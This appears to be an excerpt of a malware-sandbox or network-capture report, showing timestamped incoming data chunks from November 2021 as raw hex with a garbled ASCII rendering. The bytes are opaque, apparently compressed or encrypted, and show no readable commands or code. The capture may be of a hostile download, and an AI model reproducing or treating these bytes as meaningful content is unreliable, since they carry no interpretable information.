                                                                                                                                                                                2021-11-11 11:27:09 UTC11481INData Raw: 08 94 8b 43 0c 23 99 94 46 28 ca 4b 08 64 24 ad 08 8a 29 08 64 02 9c 38 07 a6 08 23 e6 a6 11 eb c8 fa e4 ff 72 aa b9 88 af 4c 08 f0 a6 18 53 f5 08 29 b4 18 94 b9 08 c2 7e 62 07 19 83 1c de b3 c8 94 e3 08 c8 e8 e4 ed 72 1e d3 38 14 23 08 c8 14 e4 19 71 de 14 4d 40 0c 08 4c 9e c8 c4 51 f7 d0 11 c2 0b 90 08 c8 86 e4 8b 72 3a db a8 14 3f 08 c9 4a 39 38 4f 4c 08 54 8e 47 59 16 c8 1b 74 a0 30 08 1a d4 07 86 47 1f 08 ae 78 0c 64 b3 72 0a d3 88 14 0f 08 c9 4e 39 f8 53 4c 08 58 8e 47 5d 11 f4 b0 88 f9 e5 68 72 a8 6d 99 08 82 27 b8 29 87 08 94 ea 28 ca ef 08 65 72 32 28 77 98 08 52 b2 43 07 23 57 bf ca d8 58 b7 a6 08 23 da 41 11 df c2 e4 b1 07 19 e9 1c 78 a6 68 53 7d 08 29 da 18 94 df 08 cb 4a b9 c8 4f 4c 08 f8 9d 31 68 fd 4c 08 6c bb b8 94 71 08 ca 8c 48 65 91 32
                                                                                                                                                                                Data Ascii: C#F(Kd$)d8#rLS)~br8#qM@LQr:?J98OLTGYt0GxdrN9SLXG]hrm')(er2(wRC#WX#AxhS})JOL1hLlqHe2
                                                                                                                                                                                2021-11-11 11:27:09 UTC11497INData Raw: aa e5 ae 7e f8 97 4b 8b c8 d7 32 7a 29 31 25 4a 21 d6 67 17 b6 29 b6 33 ed 5f 38 7d 84 8d ff ea 53 ec cb e7 dc b2 31 06 54 d8 ea 85 7a fa d9 04 ed 97 a0 b1 0e 9a 99 25 28 4d d9 bf 42 58 fa bc 63 5b 1e 69 b3 30 e7 3a f2 77 2d b7 b2 80 36 6a d7 99 31 1c aa 36 38 1a 34 4d d2 30 4d 79 28 3b f0 1d 6c 20 b8 04 a0 81 d7 3d 86 bc 10 16 d6 b8 df c0 4a 70 8d d1 97 06 ae 0c 4d 0d 68 3b 24 02 20 d8 01 da dc ee 83 49 14 08 18 00 18 91 96 ea 25 e1 f7 e9 00 c8 f3 bc f8 9a e0 ff d4 38 42 86 13 98 58 04 c2 5c 39 b9 8e b1 b4 5f da 29 d5 f3 8a 47 e2 ef f1 00 19 c1 23 4f e6 9f ee 52 0d aa 05 24 fe 6e 35 0e 08 08 20 64 42 62 3b fd 02 06 4f 0d e9 32 ce d0 fe 1c a3 e3 11 15 c3 3c ce 6a 10 08 ac 1e d8 a4 4c 09 80 de 80 c4 fe 1c 0a e1 a0 88 df 71 1c f1 ff db 43 d8 95 57 29 14 18
                                                                                                                                                                                Data Ascii: ~K2z)1%J!g)3_8}S1Tz%(MBXc[i0:w-6j1684M0My(;l =JpMh;$ I%8BX\9_)G#OR$n5 dBb;O2<jLqCW)
                                                                                                                                                                                2021-11-11 11:27:09 UTC11513INData Raw: 5f 41 ef 9c 64 9c 52 e3 fa 68 b5 e3 82 52 d7 e7 d9 20 f2 44 0f d0 53 ba 1b 33 70 15 b3 5f 27 dd a3 9b 5a 68 b0 5f b3 76 ea 22 1e 64 b9 6f 82 9e 5e fd 66 77 f1 1e 44 52 ef a3 a1 d7 ee 9e 24 4f af 24 c4 0b bc ff 04 3e 20 fa a6 a8 d9 27 10 55 d7 ef b6 34 e6 7d 95 dd 9c e5 b7 54 29 50 10 68 0b c1 06 bd 5d 77 c4 10 bf e5 57 45 53 22 24 20 f7 f1 6d 69 5d d9 9f 7a d7 d9 44 90 04 a9 2b be 74 88 50 b8 ff 2f 5b f5 2e 29 cb 4d 5f e4 27 58 28 42 05 10 e9 d3 07 80 53 68 c9 3f 2f db 7e f5 28 48 2a 6d e5 8b 4c e9 ae 5e 70 da c4 3e 08 4c 0d eb 7c e9 5f e5 b6 94 2d 17 19 e9 29 15 51 34 25 d6 17 7e ef 3e eb cb 85 04 68 b2 47 99 d4 8a 0a a5 bf 19 01 01 fa 5f e9 d7 32 a5 1d 30 be 94 72 dd 96 23 5c 79 c0 cf 7f 44 30 29 64 ad 5c 5b 50 50 b8 0e 01 02 c3 58 68 fe 70 5e e5 8d 03
                                                                                                                                                                                Data Ascii: _AdRhR DS3p_'Zh_v"do^fwDR$O$> 'U4}T)Ph]wWES"$ mi]zD+tP/[.)M_'X(BSh?/~(H*mL^p>L|_-)Q4%~>hG_20r#\yD0)d\[PPXhp^
                                                                                                                                                                                2021-11-11 11:27:09 UTC11529INData Raw: d8 9d d5 b2 87 77 53 ad 2d f9 0b 97 8b 29 59 6f 71 5f 09 da 6c 4f 4f e1 88 2b a9 01 9a a0 c5 7e 2f 11 43 d1 6a 8d 52 3b b8 da f4 ff 2d 0b e9 dd 42 ba e9 f6 7d 51 c3 92 0d 80 c0 0e 79 f5 2b 5e 18 b2 3d 89 f6 54 28 50 f1 90 8c b3 e5 12 f3 fa 8d ab 00 52 44 29 11 9f b2 12 e5 ed 2d 4c 29 54 c9 34 31 5a c3 be 44 c7 89 d5 8b 56 5a 17 73 a2 ef 96 70 8b 4c 01 d0 9d d4 43 69 5e 97 52 5f 39 82 40 4c fa 30 bd 94 3b 52 eb 07 4e a7 ac 70 5d 02 c9 d0 f4 4b f3 d8 c9 c9 7c cb 64 fb fe 65 7a ad ba d7 f3 2e 5b a1 13 6b c8 a0 e3 97 dc ab e6 f3 65 b3 fb 90 08 c5 cc 90 a8 e3 b5 f9 47 d7 ba 61 31 63 07 7e a7 eb 4a 87 e2 34 e5 eb 29 c0 6b b1 ab 2b 9d cc 6a c4 0c ea 39 fa 6e 05 9b 01 f0 eb f6 b9 5e b6 e9 4b a1 62 0b 96 6b b3 66 a4 42 c6 4e a2 65 73 9c 17 6b c2 45 dc 6f e4 0c a8
                                                                                                                                                                                Data Ascii: wS-)Yoq_lOO+~/CjR;-B}Qy+^=T(PRD)-L)T41ZDVZspLCi^R_9@L0;RNp]K|dez.[keGa1c~J4)k+j9n^KbkfBNeskEo
                                                                                                                                                                                2021-11-11 11:27:09 UTC11545INData Raw: ad 79 3b f2 df 6c 0c 5a 37 b9 79 a4 ee 6d 62 2e af 3e c4 7c bf 76 40 52 f4 bd 02 ee 2e 44 56 f5 e7 30 27 5c 6d 59 4d 3b b4 a9 3c 5b 24 eb 2e a6 09 4c 63 21 75 d9 6f 64 20 00 e7 06 d3 69 60 0b d5 c7 81 fd ff 45 7c c8 a6 17 17 aa ce bb 5e bc e5 e4 fb 38 9e 01 48 13 6c b5 eb 8b 2f 65 2c 17 be e2 f8 96 ea cb 5d d3 ae 24 60 38 5e 32 bf 74 c6 52 1c d6 c9 90 37 f7 51 fa c0 6a f0 73 07 b7 f6 7e 71 13 01 fa 6d 6b a7 f5 05 19 ef cb 31 ff f2 fa cf 29 bb a3 76 21 bf 54 25 d0 92 86 8a 57 dc 1e 58 96 34 25 47 23 fa f9 f6 08 bd 5c 09 7c 70 0c e1 0e 29 26 21 59 0a 15 ea b3 09 5f bf 3d 5b 6a df 90 24 0d 0c cb d5 9a 0e 9e ed 9d df 14 18 63 3e 4a 85 68 f2 2d 45 e6 89 31 38 f6 3a f9 14 0a d1 fd 4e ab df ac 00 ff e2 85 b9 23 e1 e8 2c 99 fe ba 84 72 0a 3a 80 1d 1a 3f cf 3b 32
                                                                                                                                                                                Data Ascii: y;lZ7ymb.>|v@R.DV0'\mYM;<[$.Lc!uod i`E|^8Hl/e,]$`8^2tR7Qjs~qmk1)v!T%WX4%G#\|p)&!Y_=[j$c>Jh-E18:N#,r:?;2
                                                                                                                                                                                2021-11-11 11:27:09 UTC11561INData Raw: 41 1d 5d 68 ac 89 ff 7f 76 8f 9a f0 b8 9e 4b c9 20 c6 7e 7f 47 78 60 5e 51 b9 e8 13 1c d5 38 13 9b 09 b1 d9 00 de 6c 64 df 6f b8 22 4f 06 ab 2d b5 2f cf e2 5d 14 04 cf 5d 8f 57 ba 10 e7 03 50 7f 66 18 10 cc 35 0e c4 56 14 5d 1c b1 9d 26 e1 17 04 89 cb 59 af 64 64 ee f3 a5 80 68 a1 9b 3f 1b 95 48 84 52 50 55 5a aa 60 99 54 cc fe ec 9d 2b 9a 48 64 5d fe 50 8e cb 48 fb 91 c6 04 b1 38 6f 7b af 28 bb c3 a1 0e 59 2b cb 3a 27 58 d7 3e 52 41 33 d1 31 a0 08 08 98 8d 07 2d 09 e9 ff 79 60 05 98 99 fb 60 4d 18 e5 bc fd 7d 81 eb 70 91 3b c7 0c 1a fc 14 7b af 24 49 5d 09 a9 15 22 21 f9 57 2d ca 39 a5 20 1c 8d ad e5 7e fe 89 b5 6e ec 0b bf e8 28 df 99 0e 4c 3f b3 cb 4b e6 4c 40 16 68 3a cd 87 14 4f 52 27 49 af 07 3a c1 dc 45 82 f7 d8 89 03 00 48 07 55 37 32 12 44 89 c2
                                                                                                                                                                                Data Ascii: A]hvK ~Gx`^Q8ldo"O-/]]WPf5V]&Yddh?HRPUZ`T+Hd]PH8o{(Y+:'X>RA31-y``M}p;{$I]"!W-9 ~n(L?KL@h:OR'I:EHU72D
                                                                                                                                                                                2021-11-11 11:27:09 UTC11577INData Raw: f3 03 ab 99 cb 71 c9 e2 d2 6f f5 e3 39 2c f5 e9 bc d3 62 1f 3f 79 36 a8 42 91 e6 49 55 46 ca c9 24 ef 25 5b 75 18 22 10 39 37 9d dd b7 ea 27 77 46 c9 c9 22 37 55 fb a2 29 05 95 25 25 25 2f 55 c6 3c f4 09 9f 05 ac eb 6d 3f 49 40 7f a3 86 d6 b1 8c 7a f7 8a 84 01 eb 0a fe 79 24 02 10 13 9f 4a 29 02 07 90 2b 85 e9 0e 4a 0c 01 13 44 03 25 ab cf 10 8b 0e 1a 15 f5 42 27 d5 67 23 ce 16 65 00 ab d5 30 ba 92 a6 23 3b e1 b2 06 68 84 f2 11 1c 92 52 8a aa ff 45 62 4b 4a 2d 5c 2c 79 37 63 3b 8f 31 93 ba 39 54 03 d8 f3 99 8b 0b 7e b3 55 b2 1e dc a4 79 1b 31 44 fe 7f 9d c3 af cc a6 4c 1f a6 b1 2b 18 2f 38 6b 33 fb 4f 87 13 01 1f e6 aa 81 d9 df c4 07 7a 39 9a 92 3e 1a aa 3b db 12 b7 01 ee 3d 33 f6 77 de fb 71 07 3b ee 6d 90 2e ca 89 02 26 a1 79 2a 19 74 71 79 0c 12 f9 fd
                                                                                                                                                                                Data Ascii: qo9,b?y6BIUF$%[u"97'wF"7U)%%%/U<m?I@zy$J)+JD%B'g#e0#;hREbKJ-\,y7c;19T~Uy1DL+/8k3Oz9>;=3wq;m.&y*tqy
                                                                                                                                                                                2021-11-11 11:27:09 UTC11593INData Raw: 2a ec ad e2 2b 29 3a 6c 61 3f 28 7b fd 69 a5 a3 17 04 5d 35 76 38 f3 64 88 10 08 fa d9 50 c5 ea 13 05 39 01 6c 72 2f 9f 5e 18 54 80 8a 18 9c b5 fe 8f 76 82 28 fd f0 35 b5 f4 84 7e d6 cf bf 9d b0 3e ce a0 2f b1 1e 1d 5b 30 b4 23 ee b3 ab e9 f7 ce c5 f4 c2 4d 09 fe d2 e6 92 d8 30 61 11 2d e3 67 d5 16 a0 95 dc e3 71 d6 6b 84 62 e3 be a1 63 32 63 bf 96 ac 61 96 56 6a 39 a6 f6 45 6d 13 36 ae 8f 9e 5a 6c ab c1 0b 91 57 ce 0e 7f 47 39 68 e7 16 ce ea 11 51 63 34 fd 39 c2 8e 38 dd d9 bc d9 02 0e 13 33 03 ae 8e f0 2d 04 d3 4b 44 01 a6 9d 82 1f c0 39 dc 64 54 4b 73 37 1b 47 6b 62 6c 1d 34 bd 89 68 d7 67 ef c7 08 0e 11 93 ff ce 11 13 34 24 fc 13 b5 f3 53 d6 2c b2 03 09 74 d0 10 6e 55 51 35 eb 71 94 20 a0 b1 a0 4b d9 9d cb 18 ab f2 d9 4f 61 f3 07 30 8a 1b c1 22 e8 81
                                                                                                                                                                                Data Ascii: *+):la?({i]5v8dP9lr/^Tv(5~>/[0#M0a-gqkbc2caVj9Em6ZlWG9hQc4983-KD9dTKs7Gkbl4hg4$S,tnUQ5q KOa0"
                                                                                                                                                                                2021-11-11 11:27:09 UTC11609INData Raw: a1 23 5a 05 ba 3f b0 0b 55 54 5d d4 f6 56 b7 4c b7 0e ff 42 fd 37 ae dc 64 17 4b ff 4b 82 db 5d 14 b8 9f c7 55 a5 dc 7d 5c 9f ba 9d 55 5b fa 53 a5 be 3c 66 68 0b 22 02 bf 63 54 93 69 5f 96 cc 89 c8 ba 3f dd 53 6e e6 32 04 e9 ec da 02 a2 6b 3f 60 10 6e de 00 ef a5 d3 ff e4 26 59 f9 00 36 a8 6d 00 1e d2 97 a0 19 d4 ff f1 3e ec b4 3b da 00 2c 99 0b fa f6 13 5a 13 26 1f 58 a9 cb 0c 68 01 79 0d 30 0e 5b d6 e3 40 03 b0 6f 20 83 a3 81 5e 2f 3a 91 cd b8 27 30 01 05 0f e5 9b 60 66 e0 de ab 54 13 4c 04 b3 c9 1c 98 f5 aa 3b 9a 13 b6 19 8f 7b 4e cb b6 69 18 df 67 ae 25 77 e7 43 02 12 38 77 2d 77 9e f1 46 5d c9 1f 5e 68 5e 9a 89 5b 2b 3d b4 33 ff 89 2e 77 fb 28 49 ff e7 01 82 3f 57 66 18 d7 1c 8d 95 c9 48 3d 72 02 80 f5 b2 a9 72 11 b6 77 78 29 2f 84 81 2e c7 3b 6c 4b
                                                                                                                                                                                Data Ascii: #Z?UT]VLB7dKK]U}\U[S<fh"cTi_?Sn2k?`n&Y6m>;,Z&Xhy0[@o ^/:'0`fTL;{Nig%wC8w-wF]^h^[+=3.w(I?WfH=rrwx)/.;lK
                                                                                                                                                                                2021-11-11 11:27:09 UTC11625INData Raw: 60 b4 c8 51 a6 12 00 81 a9 ef 21 99 d3 15 f6 00 1e 26 fb 80 9c af 6a c2 00 79 57 08 1b fd 42 eb d5 00 aa 98 f7 de 2a 84 17 9e 0f 3d 30 b9 69 8e 80 20 79 ac 4c c2 d1 60 82 b0 9c 7c ba 9b 90 ea 00 e6 70 8d 5f 2d a3 cb 61 00 99 75 be 22 59 01 41 d7 00 21 4b 2f fe c9 cf 85 b5 07 55 27 67 9d 93 50 c0 3d 96 b4 75 45 00 71 39 18 e4 6b be a0 0d 00 7c 21 70 75 9c 3a 09 31 e6 13 1c 19 ce b7 c0 7f 95 e6 b2 73 ba 00 de e9 55 f4 e0 24 ab f0 04 8e 1b eb b0 47 88 ab a0 14 82 16 0c 08 00 a6 e0 4e 30 e7 b1 70 38 b7 99 02 01 0b 56 5f a3 70 9d 95 c5 e0 e9 cc 33 4e 2a ab ce 81 2d 2e 9c 37 7d 2b 9e 33 70 31 2a 95 d7 9e e3 09 bf ef 8e 52 5d 71 c6 e4 2e ab e2 83 f4 bf 16 71 fb 3d 55 3b e8 0a a2 08 1c 7c 29 9d 4d 6d 82 ff 13 db 7b 7d 45 a1 96 40 ef 22 50 84 75 5e dc 54 4c 29 96
                                                                                                                                                                                Data Ascii: `Q!&jyWB*=0i yL`|p_-au"YA!K/U'gP=uEq9k|!pu:1sU$GN0p8V_p3N*-.7}+3p1*R]q.q=U;|)Mm{}E@"Pu^TL)
                                                                                                                                                                                2021-11-11 11:27:09 UTC11641INData Raw: 65 70 13 38 c6 be 52 5f ba 52 af 61 21 7b 78 e8 7f c1 30 ee 02 06 04 ff c6 31 f7 d6 0e 07 81 dc c0 8c 12 83 79 01 a2 34 41 73 e4 8d 7f 4e 7b e1 54 6b f3 99 86 e9 15 0b 04 68 a9 1b b3 7a b3 12 84 e9 39 ac a7 e4 f4 12 31 27 62 df 89 8b e4 12 9a d9 95 1d 15 14 35 24 4b cc 08 fc 3b 7c f0 de ae 27 22 29 5d f1 4f 8b e1 ee 02 4b 08 09 5f 09 18 76 88 c1 c0 92 d2 3e bf 7c 35 29 42 1d 86 67 c8 a8 09 16 90 c5 9b 01 3d 77 39 12 f8 7a f9 4b bd b3 76 a5 af b3 2f 4e ab 8e 4c cb 2b f1 1d e2 29 32 f5 67 5f ad d5 14 ea 09 12 80 fa a6 57 f1 55 50 31 75 95 fd 94 73 bd 53 db 69 57 d9 55 92 2e ae b3 71 9c 67 77 96 91 27 03 2a fd 9c 0b b5 f6 a6 58 aa 10 2f c2 1c c7 78 89 01 2f d7 71 d6 2f 7c 83 cf 52 fa 9c eb 36 62 66 24 9b 8d d7 f2 67 97 f7 21 ea f3 0c d2 05 bc d5 7f 5e 45 90
                                                                                                                                                                                Data Ascii: ep8R_Ra!{x01y4AsN{Tkhz91'b5$K;|'")]OK_v>|5)Bg=w9zKv/NL+)2g_WUP1usSiWU.qgw'*X/x/q/|R6bf$g!^E
                                                                                                                                                                                2021-11-11 11:27:09 UTC11657INData Raw: 92 07 9c 2e e3 82 04 e0 fa 72 c6 18 35 28 0c 0e 33 88 f4 ff 40 bd b7 7d e1 f6 00 01 11 b2 8c 87 5e 1e c7 90 c0 3f 5c 56 31 10 3c 28 04 2b 1c 7b 1c e5 06 29 5e f5 44 18 f3 a0 8a 24 b0 15 4f 28 12 5b 20 3c 37 eb 5e 41 ee 87 a0 1b 50 02 07 2d c2 4a ed 88 0c 18 02 69 86 90 d2 0c 70 95 dc 8a 04 71 fc 98 d0 54 b5 4f 06 5a 35 bb 68 69 db 22 b8 d7 07 e5 fa f7 eb 64 41 91 be 8f ec 4d 60 0a 27 53 ee 09 ab 41 b8 5c ca 2c 63 84 e9 53 f6 36 02 68 c2 27 eb 79 7d d4 3d 50 97 42 10 5f 7f 5b 83 8d 61 bf cf 89 00 88 0a e1 9f ff 97 f6 93 8f 51 68 63 65 cf 7e b6 4d 02 b9 40 71 3e 76 01 5f fe 9e 49 fc ae e8 13 0c e9 06 a7 c9 ec a1 ce 0d 53 2f bb c2 39 fd 32 e0 c7 b5 85 27 3c 2a a0 b0 38 ac ae 7b 96 51 be 29 6c 0c 26 d7 78 58 2d 00 9e bf 39 5d 68 c9 fc be 51 27 5e 68 57 f0 f3
                                                                                                                                                                                Data Ascii: .r5(3@}^?\V1<(+{)^D$O([ <7^AP-JipqTOZ5hi"dAM`'SA\,cS6h'y}=PB_[aQhce~M@q>v_IS/92'<*8{Q)l&xX-9]hQ'^hW
                                                                                                                                                                                2021-11-11 11:27:09 UTC11661INData Raw: 5c d4 dc 3f e6 25 82 17 56 7d 40 51 68 e8 97 f6 79 b9 14 81 94 85 3f 7e 31 2f ce 5d 4e 69 3e 05 1d be f6 6f 45 08 f4 b7 1c c4 0b 25 79 87 17 f1 08 24 fd 94 0a 16 0a 0f 07 66 fc e5 d9 2b ac 8f c1 36 1e ed 3b 3a bc 94 cf 06 64 be 77 4b 5b d1 fb d2 0d c9 3f 38 64 f0 e8 5f 17 4b 07 8e 5c 48 9e 41 11 12 74 53 44 93 11 d9 08 3c 5b b9 c8 a5 10 71 15 48 b9 12 6c a8 06 58 01 eb 62 80 08 5d 53 b0 27 05 18 7a ab 5f 01 cb 5f 57 d3 04 f6 98 93 7b ab b8 b3 da 0d 80 37 f1 ec c0 24 97 dc 43 49 79 d3 59 35 2d 44 81 20 60 47 6b 0f 04 68 26 3a f4 fa e8 93 d0 1a 69 7c 57 67 89 27 77 4b 1d a9 b4 2c 2b d0 b6 bd 66 0e 5f 43 9c be c2 22 ec 3a e8 e5 20 9e 21 27 e1 b7 f2 16 48 4d e3 75 27 67 f6 f5 01 6a f4 1b 2b c0 a0 72 03 b0 eb a8 1e f5 aa 05 88 2c 10 2a 28 81 74 52 43 2a 45 47
                                                                                                                                                                                Data Ascii: \?%V}@Qhy?~1/]Ni>oE%y$f+6;:dwK[?8d_K\HAtSD<[qHlXb]S'z__W{7$CIyY5-D `Gkh&:i|Wg'wK,+f_C": !'HMu'gj+r,*(tRC*EG
                                                                                                                                                                                2021-11-11 11:27:09 UTC11677INData Raw: 00 45 f5 6b 2f e1 bf 27 76 69 5d 92 76 f5 16 3a 09 e7 ee 6f 37 f5 16 d9 b5 d1 a0 48 17 27 d6 17 54 41 33 47 ff 48 ac ea ad 30 fe 20 85 2d fe 6f 08 12 07 27 a4 12 a3 56 d2 5f a8 29 00 77 1f a9 ef 5a bd 64 70 ec 60 27 6f 4f 9a de 60 f7 7b 1a bf 78 c1 00 f5 21 7a 60 20 31 e8 5d b5 f9 8e da 5d e6 73 10 60 7f d7 5f ec c4 e5 22 b7 f2 88 15 d5 27 b0 0a 65 52 21 ff 7d 27 d5 17 c7 a0 95 09 a9 12 ff 7f 77 a0 4d eb 3b 64 ef 4b 11 bc 58 78 4f 06 42 c8 7f 59 b7 ff 85 74 db 13 ef d2 14 58 5a 28 76 e8 ff c0 89 45 7d d0 60 d5 77 68 4b 8b 3f 5b 5f fd ae ce 83 24 bb 77 e2 70 d2 ba 2d 8c 04 18 eb ce 5f 04 bd 27 e7 6a bb cf 94 41 10 a5 c4 dc 94 59 a8 10 68 1e 29 28 7b 74 58 52 56 84 03 34 0b ff 3c 44 ea de 0b 75 b2 21 14 de 82 18 7d c4 67 95 d1 9e c3 15 86 fa 3e 47 9a 8a 51
                                                                                                                                                                                Data Ascii: Ek/'vi]v:o7H'TA3GH0 -o'V_)wZdp`'oO`{x!z` 1]]s`_"'eR!}'wM;dKXxOBYtXZ(vE}`whK?[_$wp-_'jAYh)({tXRV4<Du!}g>GQ
                                                                                                                                                                                2021-11-11 11:27:09 UTC11693INData Raw: 33 0c c2 d0 68 ab 2d 4f fa 70 78 12 b3 eb 27 3e 58 77 c4 1d 24 63 cf 1c 26 8f 41 15 16 db 2a 00 38 c4 7c 05 04 42 a2 af fd 0e 1b a5 29 d6 19 a9 22 f6 3f f0 c9 11 b5 dc cb 45 95 b3 24 6e 6c 52 b0 f3 53 10 9b c9 3c c8 29 4d 3c 28 e6 41 13 2f b1 fa 8b c0 ff 63 e4 43 4e 65 f6 09 04 99 80 fa 18 b7 f2 50 f2 57 00 3e dd 56 81 f2 4e a2 bd b8 33 4b ca f9 43 0b 3c ec df 05 42 c2 01 db bd f0 b9 7f 6a e1 5e 3a f9 98 4b fc 6c e9 6f d9 6c d8 49 ab 49 3f fd 41 07 7a 92 23 9b 2b 5d 64 d3 84 ae 50 ea 7d 4c fe d1 97 6c e5 ea b8 5c 7c 2a 27 79 90 4f 5a eb 20 82 ee 0c 48 01 7e ea 24 9a 13 14 42 19 a9 6f 0f ca c4 fb 81 61 b9 04 fd 3f 4c c9 dc 91 d1 18 d6 78 e1 18 53 83 01 3e 22 cd d4 01 4e 16 2a 8b cb c2 1a 7b dd 16 bf 1e b8 08 b3 3e f5 ff 44 79 36 38 25 e9 17 5e 14 69 dd d2
                                                                                                                                                                                Data Ascii: 3h-Opx'>Xw$c&A*8|B)"?E$nlRS<)M<(A/cCNePW>VN3KC<Bj^:KlolII?Az#+]dP}Ll\|*'yOZ H~$Boa?LxS>"N*{>Dy68%^i
                                                                                                                                                                                2021-11-11 11:27:09 UTC11709INData Raw: b8 60 6e 38 40 2d 5f 01 74 8f 0d 05 d3 75 dc 6e 0f b0 e8 b4 08 7d a2 12 c5 37 30 e4 b3 29 ac 60 7d 0c 92 80 33 7e 80 02 a3 30 b9 77 f0 09 d4 fb 60 37 18 ba d2 ef 69 a6 9f 8b 09 fd 5f 15 29 21 22 2d f9 40 39 68 c0 98 27 6d 6f 10 ce e3 b8 25 ff 16 1c 94 bd 82 47 ac 75 5d 40 b7 f7 de 98 a8 3b 53 7c 27 7d fc 63 25 f5 c9 d7 a8 fa 57 85 f0 ce 80 58 b9 ac 3d 1e 77 f7 df 97 c7 1a de 08 60 5a 91 f2 17 e3 d4 01 b0 9e 09 5f f6 90 80 c0 be ff 4e 2f e3 04 41 d6 3f f4 64 e2 13 5c f7 73 8d 6a 3e bc 4e e6 d2 51 c2 19 2a e2 60 23 54 a5 5d 1d 80 ad e6 9a 98 4f 0b ad c4 fe 37 80 6b 34 a1 67 3b ec f3 f8 07 25 77 1d ff 44 3e 06 eb 24 5e 37 33 22 12 01 bd 18 81 64 dc 5b 33 61 5c 2b 0b 57 64 9f e0 1b e1 ce 12 fb ed 38 8c 32 e8 19 5b fa 2e 0e e9 c4 5f dd 40 4f c1 0c 4a 3a f2 3b
                                                                                                                                                                                Data Ascii: `n8@-_tun}70)`}3~0w`7i_)!"-@9h'mo%Gu]@;S|'}c%WX=w`Z_N/A?d\sj>NQ*`#T]O7k4g;%wD>$^73"d[3a\+Wd82[._@OJ:;
                                                                                                                                                                                2021-11-11 11:27:09 UTC11725INData Raw: 55 6f 13 96 52 20 eb 9f 0d f7 75 63 09 5d c1 f5 c3 f4 2e 27 7c 86 e0 b9 bf b3 fe 12 5f 31 d1 52 33 fa 8e 47 80 bb d0 e7 fd 66 34 f7 d3 04 e9 7b 05 84 29 78 3d fa 26 62 08 5a 06 ae 20 c7 8a b3 bd 41 7b f8 46 c6 2f 68 fc ff 13 9e a6 54 58 52 62 3a 88 8b a8 19 89 07 52 01 c4 5a aa e6 b3 a5 b1 7b 2a df ca 4e ff c0 e9 d7 3f fb 02 6b f7 d1 c1 e1 01 c0 cb 99 08 2d 9f 7f ff 38 ee c7 b3 00 13 77 2d 1e 2b 7d 1f 29 27 c1 58 d5 49 f7 54 74 28 b4 12 15 f9 3e b1 04 05 07 84 48 30 fe 16 7b ff 27 7e 51 fd 3a 75 77 4e a0 3d 52 ba 97 da e5 00 75 b8 e2 fa 0e cc ec 01 4c d0 21 f0 ba 3d fd 27 fb 7f c8 a8 8b a9 f2 59 a0 f8 e1 d0 30 e6 1c 18 c3 e3 fc 96 36 02 c4 6b f3 86 55 de ac 8a 85 d2 bf 17 fb 30 52 86 7e 5b eb 71 b9 44 f6 35 62 80 98 6c db ee 04 6e f7 d5 ff c5 88 1e 6d 4f
                                                                                                                                                                                Data Ascii: UoR uc].'|_1R3Gf4{)x=&bZ A{F/hTXRb:RZ{*N?k-8w-+})'XITt(>H0{'~Q:uwN=RuL!='Y06kU0R~[qD5blnmO
                                                                                                                                                                                2021-11-11 11:27:09 UTC11741INData Raw: 66 f4 44 49 00 2c d4 f2 33 5c 04 d3 8b 00 e9 96 cc fc 0b ea 1e 5f 29 f7 db b0 40 a1 36 d9 c6 7c fa 00 7b 7d 46 89 d2 2a 35 5d fe 24 ad d8 40 d2 29 7e 93 0a 4b a3 23 a9 10 c0 62 37 d2 f0 0a 2c 18 76 49 30 7c 00 79 3d 14 cc be 16 9b 18 00 39 67 04 fb 76 9c ee 4d 00 9a fc 6a d2 9e d8 1b 79 85 09 e1 94 87 ac 2d 60 89 7b ba 13 00 18 81 68 1c 3e ad b0 d9 00 2e 05 fd e0 a4 7d 59 02 02 42 f7 cb 48 f3 91 b0 28 d7 17 01 52 54 e5 6b da bd 07 20 c1 9a 3a 78 7f 8f 4c 46 a4 a0 33 bf 5d f7 70 07 cd d5 ff 6c 78 df 0a 6d 28 c0 e7 37 1c 1e 00 85 fe a1 1d e9 d8 74 c0 e4 1f 00 5e 21 c3 38 c8 b4 40 07 58 27 2b 00 d8 69 94 1c c2 99 23 af 50 00 2e 91 c9 f2 fc 1c 73 ce 00 b0 8f 58 85 06 69 d8 c7 0e cb 47 38 04 a2 ae e0 8b bc 28 38 06 11 03 3d cb 3c dc a7 f8 81 05 03 07 36 2d 28
                                                                                                                                                                                Data Ascii: fDI,3\_)@6|{}F*5]$@)~K#b7,vI0|y=9gvMjy-`{h>.}YBH(RTk :xLF3]plxm(7t^!8@X'+i#P.sXiG8(8=<6-(
                                                                                                                                                                                2021-11-11 11:27:09 UTC11757INData Raw: 13 af 35 00 33 b1 67 22 5e 79 7e 4e 00 bf fd d0 4f a3 97 d4 e0 01 25 65 44 85 bc c7 56 20 13 b1 00 ef 8b 94 77 c3 90 bb a0 00 9c 63 e6 70 71 41 5f f6 02 a8 34 56 74 01 8b e0 cf d7 92 3f 76 f3 80 3d ed ff 06 d8 55 84 91 80 40 b7 d4 f1 93 01 f9 a2 82 b4 d2 11 1d e8 4c 20 00 d7 ba 0e c4 e5 8e f1 50 7a 9e 01 94 6e 7a 4d 3c a9 91 c0 70 b8 70 31 00 82 fe 57 85 e6 f4 1a 8e 00 32 62 29 94 d0 64 d5 0c 79 8f 00 fb e7 0b 19 5e 20 37 d1 26 2e 98 48 50 7c 6e 03 ef e1 0a 49 6b 2c 80 19 cb 8b 00 31 37 96 15 04 13 0c 89 00 0f a3 9d 7d 3c f0 06 bd 0e 8d 67 7a f8 20 f6 53 c7 29 71 07 cf bb 13 43 b6 50 6b 23 ff ee 9d 3e d0 00 0a b6 8d 99 1d b4 04 a9 03 0b dd 32 2f c4 3d 9b 8b e8 f1 1f 53 1c 15 9d 28 85 6c d1 09 c0 cd 74 ee ff 0e c6 fb ec dd 07 a9 cb 20 5e 0d 60 2a 1c fe c9
                                                                                                                                                                                Data Ascii: 53g"^y~NO%eDV wcpqA_4Vt?v=U@L PznzM<pp1W2b)dy^ 7&.HP|nIk,17}<gz S)qCPk#>2/=S(lt ^`*
